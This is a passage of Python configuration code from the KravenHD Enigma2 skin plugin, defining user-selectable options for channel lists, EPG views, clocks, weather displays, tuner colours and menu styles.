_(\"runningtext\")),\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionStyle = ConfigSelection(default=\"channelselection-style-minitv\", choices = [\n\t\t\t\t(\"channelselection-style-nopicon\", _(\"no Picon\")),\n\t\t\t\t(\"channelselection-style-nopicon2\", _(\"no Picon2\")),\n\t\t\t\t(\"channelselection-style-xpicon\", _(\"X-Picons\")),\n\t\t\t\t(\"channelselection-style-zpicon\", _(\"Z-Picons\")),\n\t\t\t\t(\"channelselection-style-zzpicon\", _(\"ZZ-Picons\")),\n\t\t\t\t(\"channelselection-style-zzzpicon\", _(\"ZZZ-Picons\")),\n\t\t\t\t(\"channelselection-style-minitv\", _(\"MiniTV left\")),\n\t\t\t\t(\"channelselection-style-minitv4\", _(\"MiniTV right\")),\n\t\t\t\t(\"channelselection-style-minitv3\", _(\"Preview\")),\n\t\t\t\t(\"channelselection-style-nobile\", _(\"Nobile\")),\n\t\t\t\t(\"channelselection-style-nobile2\", _(\"Nobile 2\")),\n\t\t\t\t(\"channelselection-style-nobile-minitv\", _(\"Nobile MiniTV\")),\n\t\t\t\t(\"channelselection-style-nobile-minitv3\", _(\"Nobile Preview\")),\n\t\t\t\t(\"channelselection-style-minitv-picon\", _(\"MiniTV Picon\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionStyle2 = ConfigSelection(default=\"channelselection-style-minitv\", choices = [\n\t\t\t\t(\"channelselection-style-nopicon\", _(\"no Picon\")),\n\t\t\t\t(\"channelselection-style-nopicon2\", _(\"no Picon2\")),\n\t\t\t\t(\"channelselection-style-xpicon\", _(\"X-Picons\")),\n\t\t\t\t(\"channelselection-style-zpicon\", _(\"Z-Picons\")),\n\t\t\t\t(\"channelselection-style-zzpicon\", _(\"ZZ-Picons\")),\n\t\t\t\t(\"channelselection-style-zzzpicon\", _(\"ZZZ-Picons\")),\n\t\t\t\t(\"channelselection-style-minitv\", _(\"MiniTV left\")),\n\t\t\t\t(\"channelselection-style-minitv4\", _(\"MiniTV right\")),\n\t\t\t\t(\"channelselection-style-minitv3\", _(\"Preview\")),\n\t\t\t\t(\"channelselection-style-minitv33\", _(\"Extended Preview\")),\n\t\t\t\t(\"channelselection-style-minitv2\", _(\"Dual TV\")),\n\t\t\t\t(\"channelselection-style-minitv22\", _(\"Dual TV 2\")),\n\t\t\t\t(\"channelselection-style-nobile\", _(\"Nobile\")),\n\t\t\t\t(\"channelselection-style-nobile2\", _(\"Nobile 2\")),\n\t\t\t\t(\"channelselection-style-nobile-minitv\", _(\"Nobile MiniTV\")),\n\t\t\t\t(\"channelselection-style-nobile-minitv3\", _(\"Nobile Preview\")),\n\t\t\t\t(\"channelselection-style-nobile-minitv33\", _(\"Nobile Extended Preview\")),\n\t\t\t\t(\"channelselection-style-minitv-picon\", _(\"MiniTV Picon\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionMode = ConfigSelection(default=\"zap\", choices = [\n\t\t\t\t(\"zap\", _(\"Zap (1xOK)\")),\n\t\t\t\t(\"preview\", _(\"Preview (2xOK)\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionTrans = ConfigSelection(default=\"32\", choices = TransList)\n\nconfig.plugins.KravenHD.ChannelSelectionEPGSize1 = ConfigSelection(default=\"small\", choices = [\n\t\t\t\t(\"small\", _(\"small\")),\n\t\t\t\t(\"big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionEPGSize2 = ConfigSelection(default=\"small\", choices = [\n\t\t\t\t(\"small\", _(\"small\")),\n\t\t\t\t(\"big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionEPGSize3 = ConfigSelection(default=\"small\", choices = [\n\t\t\t\t(\"small\", _(\"small\")),\n\t\t\t\t(\"big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionServiceNAList = ConfigSelection(default=\"FFEA04\", choices = ColorSelfList)\nconfig.plugins.KravenHD.ChannelSelectionServiceNASelf = ConfigText(default=\"FFEA04\")\nconfig.plugins.KravenHD.ChannelSelectionServiceNA = ConfigText(default=\"FFEA04\")\n\nconfig.plugins.KravenHD.NumberZapExt = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"numberzapext-xpicon\", _(\"X-Picons\")),\n\t\t\t\t(\"numberzapext-zpicon\", _(\"Z-Picons\")),\n\t\t\t\t(\"numberzapext-zzpicon\", _(\"ZZ-Picons\")),\n\t\t\t\t(\"numberzapext-zzzpicon\", _(\"ZZZ-Picons\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.NZBorderList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.NZBorderSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.NZBorder = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.CoolTVGuide = ConfigSelection(default=\"cooltv-minitv\", choices = [\n\t\t\t\t(\"cooltv-minitv\", _(\"MiniTV\")),\n\t\t\t\t(\"cooltv-picon\", _(\"Picon\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.GraphicalEPG = ConfigSelection(default=\"text-minitv\", choices = [\n\t\t\t\t(\"text\", _(\"Text\")),\n\t\t\t\t(\"text-minitv\", _(\"Text with MiniTV\")),\n\t\t\t\t(\"graphical\", _(\"graphical\")),\n\t\t\t\t(\"graphical-minitv\", _(\"graphical with MiniTV\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.GMEDescriptionSize = ConfigSelection(default=\"small\", choices = [\n\t\t\t\t(\"small\", _(\"small\")),\n\t\t\t\t(\"big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.GMESelFgList = ConfigSelection(default=\"ffffff\", choices = [\n\t\t\t\t(\"ffffff\", _(\"white\")),\n\t\t\t\t(\"F0A30A\", _(\"amber\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.GMESelFgSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.GMESelFg = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.GMESelBgList = ConfigSelection(default=\"389416\", choices = [\n\t\t\t\t(\"389416\", _(\"green\")),\n\t\t\t\t(\"0064c7\", _(\"blue\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.GMESelBgSelf = ConfigText(default=\"389416\")\nconfig.plugins.KravenHD.GMESelBg = ConfigText(default=\"389416\")\n\nconfig.plugins.KravenHD.GMENowFgList = ConfigSelection(default=\"F0A30A\", choices = [\n\t\t\t\t(\"ffffff\", _(\"white\")),\n\t\t\t\t(\"F0A30A\", _(\"amber\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.GMENowFgSelf = ConfigText(default=\"F0A30A\")\nconfig.plugins.KravenHD.GMENowFg = ConfigText(default=\"F0A30A\")\n\nconfig.plugins.KravenHD.GMENowBgList = ConfigSelection(default=\"0064c7\", choices = [\n\t\t\t\t(\"389416\", _(\"green\")),\n\t\t\t\t(\"0064c7\", _(\"blue\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.GMENowBgSelf = ConfigText(default=\"0064c7\")\nconfig.plugins.KravenHD.GMENowBg = ConfigText(default=\"0064c7\")\n\nconfig.plugins.KravenHD.GMEBorderList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.GMEBorderSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.GMEBorder = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.MovieSelection = ConfigSelection(default=\"movieselection-no-cover\", choices = [\n\t\t\t\t(\"movieselection-no-cover\", _(\"no Cover\")),\n\t\t\t\t(\"movieselection-no-cover2\", _(\"no Cover2\")),\n\t\t\t\t(\"movieselection-small-cover\", _(\"small Cover\")),\n\t\t\t\t(\"movieselection-big-cover\", _(\"big Cover\")),\n\t\t\t\t(\"movieselection-minitv\", _(\"MiniTV\")),\n\t\t\t\t(\"movieselection-minitv-cover\", _(\"MiniTV + Cover\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.EPGSelection = ConfigSelection(default=\"epgselection-standard\", choices = [\n\t\t\t\t(\"epgselection-standard\", _(\"standard\")),\n\t\t\t\t(\"epgselection-minitv\", _(\"MiniTV\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.EMCStyle = ConfigSelection(default=\"emc-minitv\", choices = [\n\t\t\t\t(\"emc-nocover\", _(\"no Cover\")),\n\t\t\t\t(\"emc-nocover2\", _(\"no Cover2\")),\n\t\t\t\t(\"emc-smallcover\", _(\"small Cover\")),\n\t\t\t\t(\"emc-smallcover2\", _(\"small Cover2\")),\n\t\t\t\t(\"emc-bigcover\", _(\"big Cover\")),\n\t\t\t\t(\"emc-bigcover2\", _(\"big Cover2\")),\n\t\t\t\t(\"emc-verybigcover\", _(\"very big Cover\")),\n\t\t\t\t(\"emc-verybigcover2\", _(\"very big Cover2\")),\n\t\t\t\t(\"emc-minitv\", _(\"MiniTV\")),\n\t\t\t\t(\"emc-minitv2\", _(\"MiniTV2\")),\n\t\t\t\t(\"emc-full\", _(\"full\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.RunningText = ConfigSelection(default=\"startdelay=4000\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"startdelay=2000\", _(\"2 sec\")),\n\t\t\t\t(\"startdelay=4000\", _(\"4 sec\")),\n\t\t\t\t(\"startdelay=6000\", _(\"6 sec\")),\n\t\t\t\t(\"startdelay=8000\", _(\"8 sec\")),\n\t\t\t\t(\"startdelay=10000\", _(\"10 sec\")),\n\t\t\t\t(\"startdelay=15000\", _(\"15 sec\")),\n\t\t\t\t(\"startdelay=20000\", _(\"20 sec\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.RunningTextSpeed = ConfigSelection(default=\"steptime=100\", choices = [\n\t\t\t\t(\"steptime=200\", _(\"5 px/sec\")),\n\t\t\t\t(\"steptime=100\", _(\"10 px/sec\")),\n\t\t\t\t(\"steptime=66\", _(\"15 px/sec\")),\n\t\t\t\t(\"steptime=50\", _(\"20 px/sec\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.RunningTextSpeed2 = ConfigSelection(default=\"steptime=100\", choices = [\n\t\t\t\t(\"steptime=200\", _(\"5 px/sec\")),\n\t\t\t\t(\"steptime=100\", _(\"10 px/sec\")),\n\t\t\t\t(\"steptime=50\", _(\"20 px/sec\")),\n\t\t\t\t(\"steptime=33\", _(\"30 px/sec\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ScrollBar = ConfigSelection(default=\"on\", choices = [\n\t\t\t\t(\"on\", _(\"on\")),\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IconStyle = ConfigSelection(default=\"icons-light\", choices = [\n\t\t\t\t(\"icons-light\", _(\"light\")),\n\t\t\t\t(\"icons-dark\", _(\"dark\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IconStyle2 = ConfigSelection(default=\"icons-light2\", choices = [\n\t\t\t\t(\"icons-light2\", _(\"light\")),\n\t\t\t\t(\"icons-dark2\", _(\"dark\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ClockStyle = ConfigSelection(default=\"clock-classic\", choices = [\n\t\t\t\t(\"clock-classic\", _(\"standard\")),\n\t\t\t\t(\"clock-classic-big\", _(\"standard big\")),\n\t\t\t\t(\"clock-analog\", _(\"analog\")),\n\t\t\t\t(\"clock-android\", _(\"android\")),\n\t\t\t\t(\"clock-color\", _(\"colored\")),\n\t\t\t\t(\"clock-flip\", _(\"flip\")),\n\t\t\t\t(\"clock-weather\", _(\"weather icon\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ClockStyleNoInternet = ConfigSelection(default=\"clock-classic\", choices = [\n\t\t\t\t(\"clock-classic\", _(\"standard\")),\n\t\t\t\t(\"clock-classic-big\", _(\"standard big\")),\n\t\t\t\t(\"clock-analog\", _(\"analog\")),\n\t\t\t\t(\"clock-color\", _(\"colored\")),\n\t\t\t\t(\"clock-flip\", _(\"flip\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.WeatherStyle = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"weather-big\", _(\"big\")),\n\t\t\t\t(\"weather-small\", _(\"small\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.WeatherStyle2 = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"weather-left\", _(\"on\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.WeatherStyle3 = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"weather-left\", _(\"on\")),\n\t\t\t\t(\"netatmobar\", _(\"NetatmoBar\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.WeatherStyleNoInternet = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ECMVisible = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"ib\", _(\"Infobar\")),\n\t\t\t\t(\"sib\", _(\"SecondInfobar\")),\n\t\t\t\t(\"ib+sib\", _(\"Infobar & SecondInfobar\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ECMLine1 = ConfigSelection(default=\"ShortReader\", choices = [\n\t\t\t\t(\"VeryShortCaid\", _(\"short with CAID\")),\n\t\t\t\t(\"VeryShortReader\", _(\"short with source\")),\n\t\t\t\t(\"ShortReader\", _(\"compact\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ECMLine2 = ConfigSelection(default=\"ShortReader\", choices = [\n\t\t\t\t(\"VeryShortCaid\", _(\"short with CAID\")),\n\t\t\t\t(\"VeryShortReader\", _(\"short with source\")),\n\t\t\t\t(\"ShortReader\", _(\"compact\")),\n\t\t\t\t(\"Normal\", _(\"balanced\")),\n\t\t\t\t(\"Long\", _(\"extensive\")),\n\t\t\t\t(\"VeryLong\", _(\"complete\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ECMLine3 = ConfigSelection(default=\"ShortReader\", choices = [\n\t\t\t\t(\"VeryShortCaid\", _(\"short with CAID\")),\n\t\t\t\t(\"VeryShortReader\", _(\"short with source\")),\n\t\t\t\t(\"ShortReader\", _(\"compact\")),\n\t\t\t\t(\"Normal\", _(\"balanced\")),\n\t\t\t\t(\"Long\", _(\"extensive\")),\n\t\t\t\t])\n\nconfig.plugins.KravenHD.FTA = ConfigSelection(default=\"FTAVisible\", choices = [\n\t\t\t\t(\"FTAVisible\", _(\"on\")),\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.SystemInfo = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"systeminfo-small\", _(\"small\")),\n\t\t\t\t(\"systeminfo-big\", _(\"big\")),\n\t\t\t\t(\"systeminfo-bigsat\", _(\"big + Sat\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.SIB = ConfigSelection(default=\"sib4\", choices = [\n\t\t\t\t(\"sib1\", _(\"MiniTV/weather\")),\n\t\t\t\t(\"sib2\", _(\"left/right\")),\n\t\t\t\t(\"sib3\", _(\"single\")),\n\t\t\t\t(\"sib4\", _(\"MiniTV\")),\n\t\t\t\t(\"sib5\", _(\"MiniTV2\")),\n\t\t\t\t(\"sib6\", _(\"Weather\")),\n\t\t\t\t(\"sib7\", _(\"Weather2\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.TunerBusyList = ConfigSelection(default=\"CCCC00\", choices = [\n\t\t\t\t(\"CCCC00\", _(\"yellow\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.TunerBusySelf = ConfigText(default=\"CCCC00\")\nconfig.plugins.KravenHD.TunerBusy = ConfigText(default=\"CCCC00\")\n\nconfig.plugins.KravenHD.TunerLiveList = ConfigSelection(default=\"00B400\", choices = [\n\t\t\t\t(\"00B400\", _(\"green\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.TunerLiveSelf = ConfigText(default=\"00B400\")\nconfig.plugins.KravenHD.TunerLive = ConfigText(default=\"00B400\")\n\nconfig.plugins.KravenHD.TunerRecordList = ConfigSelection(default=\"FF0C00\", choices = [\n\t\t\t\t(\"FF0C00\", _(\"red\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.TunerRecordSelf = ConfigText(default=\"FF0C00\")\nconfig.plugins.KravenHD.TunerRecord = ConfigText(default=\"FF0C00\")\n\nconfig.plugins.KravenHD.TunerXtremeBusyList = ConfigSelection(default=\"1BA1E2\", choices = [\n\t\t\t\t(\"1BA1E2\", _(\"cyan\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.TunerXtremeBusySelf = ConfigText(default=\"1BA1E2\")\nconfig.plugins.KravenHD.TunerXtremeBusy = ConfigText(default=\"1BA1E2\")\n\nconfig.plugins.KravenHD.ShowUnusedTuner = ConfigSelection(default=\"on\", choices = [\n\t\t\t\t(\"on\", _(\"on\")),\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ShowAgcSnr = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"on\", _(\"on\")),\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\t\t\t\t\nconfig.plugins.KravenHD.Infobox = ConfigSelection(default=\"sat\", choices = [\n\t\t\t\t(\"sat\", _(\"Tuner/Satellite + SNR\")),\n\t\t\t\t(\"tunerinfo\", _(\"Tunerinfo\")),\n\t\t\t\t(\"cpu\", _(\"CPU + Load\")),\n\t\t\t\t(\"temp\", _(\"Temperature + Fan\"))\n\t\t\t\t])\n\t\t\t\t\nconfig.plugins.KravenHD.Infobox2 = ConfigSelection(default=\"tunerinfo\", choices = [\n\t\t\t\t(\"tunerinfo\", _(\"Tunerinfo\")),\n\t\t\t\t(\"cpu\", _(\"CPU + Load\")),\n\t\t\t\t(\"temp\", _(\"Temperature + Fan\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IBColor = ConfigSelection(default=\"all-screens\", choices = [\n\t\t\t\t(\"all-screens\", _(\"in all Screens\")),\n\t\t\t\t(\"only-infobar\", _(\"only Infobar, SecondInfobar & Players\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.About = ConfigSelection(default=\"about\", choices = [\n\t\t\t\t(\"about\", _(\"KravenHD\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.Logo = ConfigSelection(default=\"minitv\", choices = [\n\t\t\t\t(\"logo\", _(\"Logo\")),\n\t\t\t\t(\"minitv\", _(\"MiniTV\")),\n\t\t\t\t(\"metrix-icons\", _(\"Icons\")),\n\t\t\t\t(\"minitv-metrix-icons\", _(\"MiniTV + Icons\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.LogoNoInternet = ConfigSelection(default=\"minitv\", choices = [\n\t\t\t\t(\"logo\", _(\"Logo\")),\n\t\t\t\t(\"minitv\", _(\"MiniTV\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.MainmenuFontsize = ConfigSelection(default=\"mainmenu-big\", choices = [\n\t\t\t\t(\"mainmenu-small\", _(\"small\")),\n\t\t\t\t(\"mainmenu-middle\", _(\"middle\")),\n\t\t\t\t(\"mainmenu-big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.MainmenuHorTitleFontList = ConfigSelection(default=\"F0A30A\", choices = ColorSelfList)\nconfig.plugins.KravenHD.MainmenuHorTitleFontSelf = ConfigText(default=\"F0A30A\")\nconfig.plugins.KravenHD.MainmenuHorTitleFont = ConfigText(default=\"F0A30A\")\n\nconfig.plugins.KravenHD.MainmenuHorIconColorList = ConfigSelection(default=\"3F3F3F\", choices = ColorSelfList)\nconfig.plugins.KravenHD.MainmenuHorIconColorSelf = ConfigText(default=\"3F3F3F\")\nconfig.plugins.KravenHD.MainmenuHorIconColor = ConfigText(default=\"3F3F3F\")\n\nconfig.plugins.KravenHD.MenuIcons = ConfigSelection(default=\"stony272\", choices = [\n\t\t\t\t(\"stony272\", _(\"stony272\")),\n\t\t\t\t(\"stony272-metal\", _(\"stony272-metal\")),\n\t\t\t\t(\"stony272-gold-round\", _(\"stony272-gold-round\")),\n\t\t\t\t(\"stony272-gold-square\", _(\"stony272-gold-square\")),\n\t\t\t\t(\"rennmaus-kleinerteufel\", _(\"rennmaus-kleiner.teufel\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.DebugNames = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"screennames-on\", _(\"on\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.WeatherView = ConfigSelection(default=\"meteo\", choices = [\n\t\t\t\t(\"icon\", _(\"Icon\")),\n\t\t\t\t(\"meteo\", _(\"Meteo\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.MeteoColor = ConfigSelection(default=\"meteo-light\", choices = [\n\t\t\t\t(\"meteo-light\", _(\"light\")),\n\t\t\t\t(\"meteo-dark\", _(\"dark\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.Primetimeavailable = ConfigSelection(default=\"primetime-on\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"primetime-on\", _(\"on\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.EMCSelectionColors = ConfigSelection(default=\"global\", choices = [\n\t\t\t\t(\"global\", _(\"global colors\")),\n\t\t\t\t(\"custom\", _(\"define new colors\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.EMCSelectionBackgroundList = ConfigSelection(default=\"213305\", choices = ColorSelfList)\nconfig.plugins.KravenHD.EMCSelectionBackgroundSelf = ConfigText(default=\"213305\")\nconfig.plugins.KravenHD.EMCSelectionBackground = ConfigText(default=\"213305\")\n\nconfig.plugins.KravenHD.EMCSelectionFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.EMCSelectionFontSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.EMCSelectionFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.SerienRecorder = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"serienrecorder\", _(\"on\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.MediaPortal = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"mediaportal\", _(\"on\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.PVRState = ConfigSelection(default=\"pvrstate-center-big\", choices = [\n\t\t\t\t(\"pvrstate-center-big\", _(\"center big\")),\n\t\t\t\t(\"pvrstate-center-small\", _(\"center small\")),\n\t\t\t\t(\"pvrstate-left-small\", _(\"left small\")),\n\t\t\t\t(\"pvrstate-off\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.PigStyle = ConfigText(default=\"\")\nconfig.plugins.KravenHD.PigMenuActive = ConfigYesNo(default=False)\n\nconfig.plugins.KravenHD.FileCommander = ConfigSelection(default=\"filecommander-hor\", choices = [\n\t\t\t\t(\"filecommander-hor\", _(\"horizontal\")),\n\t\t\t\t(\"filecommander-ver\", _(\"vertical\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.msn_language = ConfigSelection(default=\"de-DE\", choices = [\n\t\t\t\t(\"de-DE\", _(\"Deutsch\")),\n\t\t\t\t(\"en-US\", _(\"English\")),\n\t\t\t\t(\"ru-RU\", _(\"Russian\")),\n\t\t\t\t(\"it-IT\", _(\"Italian\")),\n\t\t\t\t(\"es-ES\", _(\"Spanish\")),\n\t\t\t\t(\"uk-UA\", _(\"Ukrainian\")),\n\t\t\t\t(\"pt-PT\", _(\"Portuguese\")),\n\t\t\t\t(\"ro-RO\", _(\"Romanian\")),\n\t\t\t\t(\"pl-PL\", _(\"Polish\")),\n\t\t\t\t(\"fi-FI\", _(\"Finnish\")),\n\t\t\t\t(\"nl-NL\", _(\"Dutch\")),\n\t\t\t\t(\"fr-FR\", _(\"French\")),\n\t\t\t\t(\"bg-BG\", _(\"Bulgarian\")),\n\t\t\t\t(\"sv-SE\", _(\"Swedish\")),\n\t\t\t\t(\"tr-TR\", _(\"Turkish\")),\n\t\t\t\t(\"hr-HR\", _(\"Croatian\")),\n\t\t\t\t(\"ca-AD\", _(\"Catalan\")),\n\t\t\t\t(\"sk-SK\", _(\"Slovak\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.msn_searchby = ConfigSelection(default=\"auto-ip\", choices = [\n\t\t\t\t(\"auto-ip\", _(\"IP\")),\n\t\t\t\t(\"location\", _(\"Enter location manually\"))\n\t\t\t\t])\n\nSearchResultList = []\nconfig.plugins.KravenHD.msn_list = ConfigSelection(default = \"\", choices = SearchResultList)\n\nconfig.plugins.KravenHD.msn_cityfound = ConfigText(default = \"\")\nconfig.plugins.KravenHD.msn_cityname = ConfigText(default = \"\")\nconfig.plugins.KravenHD.msn_code = ConfigText(default = \"\")\n\nconfig.plugins.KravenHD.PlayerClock = ConfigSelection(default=\"player-classic\", choices = [\n\t\t\t\t(\"player-classic\", _(\"standard\")),\n\t\t\t\t(\"player-android\", _(\"android\")),\n\t\t\t\t(\"player-flip\", _(\"flip\")),\n\t\t\t\t(\"player-weather\", _(\"weather icon\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.Android2List = ConfigSelection(default=\"000000\", choices = ColorSelfList)\nconfig.plugins.KravenHD.Android2Self = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.Android2 = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.CategoryProfiles = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategorySystem = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryGlobalColors = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryInfobarLook = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryInfobarContents = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryWeather = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryClock = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryECMInfos = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryViews = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryChannellist = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryNumberZap = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryGraphicalEPG = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryEMC = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryPlayers = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryAntialiasing = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.CategoryVarious = ConfigSelection(default=\"category\", choices = [\n\t\t\t\t(\"category\", _(\" \"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.UnwatchedColorList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.UnwatchedColorSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.UnwatchedColor = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.WatchingColorList = ConfigSelection(default=\"0050EF\", choices = ColorSelfList)\nconfig.plugins.KravenHD.WatchingColorSelf = ConfigText(default=\"0050EF\")\nconfig.plugins.KravenHD.WatchingColor = ConfigText(default=\"0050EF\")\n\nconfig.plugins.KravenHD.FinishedColorList = ConfigSelection(default=\"70AD11\", choices = ColorSelfList)\nconfig.plugins.KravenHD.FinishedColorSelf = ConfigText(default=\"70AD11\")\nconfig.plugins.KravenHD.FinishedColor = 